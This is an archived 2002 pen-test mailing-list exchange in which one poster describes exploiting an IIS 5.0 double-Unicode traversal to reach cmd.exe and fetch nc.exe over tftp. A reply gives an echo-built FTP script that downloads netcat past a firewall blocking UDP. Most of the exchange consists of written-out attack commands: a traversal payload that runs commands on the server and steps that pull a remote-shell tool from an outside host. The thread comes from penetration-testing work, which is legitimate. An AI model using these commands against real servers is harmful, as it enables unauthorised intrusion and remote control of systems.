RE: Can't get a shell

From: Jeremy Junginger (jjungingerat_private)
Date: Thu Jul 11 2002 - 10:06:25 PDT

Next message: juan.francisco.falconat_private: "Re: escalating IUSR to admin rights via unicode and iis4"

Previous message: Jeanette LaRosa: "Re: escalating IUSR to admin rights via unicode and iis4"
Maybe in reply to: Gaziel, Avishay: "Can't get a shell"
Next in thread: Coral J. Cook: "RE: Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Use ftp with a script if ftp is allowed outbound.  Example:

Open x.x.x.x >ftpscript
Echo user >>ftpscript
Echo password >>ftpscript
Echo get nc.exe >>ftpscript
Echo quit >>ftpscript

And then at the prompt, fire up:

Ftp -s:ftpscript

And that should get you what you need, right??

-Jeremy

-----Original Message-----
From: Gaziel, Avishay [mailto:agazielat_private] 
Sent: Tuesday, July 09, 2002 9:33 AM
To: PEN-TESTat_private
Subject: Can't get a shell


Hi All,
Situation:
An  IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.)
IIS sitting behind a firewall.
Problem:
host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+myserver
+get
+nc.exe doesn't work
I keep getting (from my pumpkin tftp server) an error message saying
that there's something wrong with the variables. another strange thing
is that even if I don't get the error message the tftp session will not
start and will timeout, if I deny access I keep getting access requests
from the IIS.(Pumpkin is configured to prompt whenever a download/upload
starts) What have I tried to do?  Use
host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+myserver+get+
nc.e
xe instead of the above mentioned...doesn't   work as well.
What do I think is wrong?
The FW is blocking all udp traffic out.
What do I need?
1. Suggestions
2.Workarounds
Avishay 





************************************************************************
*****
The information in this email is confidential and may be legally
privileged. It is intended solely for the addressee. Access to this
email by anyone else is unauthorized. 

If you are not the intended recipient, any disclosure, copying,
distribution or any action taken or omitted to be taken in reliance on
it, is prohibited and may be unlawful. When addressed to our clients any
opinions or advice contained in this email are subject to the terms and
conditions expressed in
the governing KPMG client engagement letter.         
************************************************************************
*****

------------------------------------------------------------------------
----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see: https://alerts.securityfocus.com/

application/x-pkcs7-signature attachment: smime.p7s

Next message: juan.francisco.falconat_private: "Re: escalating IUSR to admin rights via unicode and iis4"
Previous message: Jeanette LaRosa: "Re: escalating IUSR to admin rights via unicode and iis4"
Maybe in reply to: Gaziel, Avishay: "Can't get a shell"
Next in thread: Coral J. Cook: "RE: Can't get a shell"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 11 2002 - 17:11:15 PDT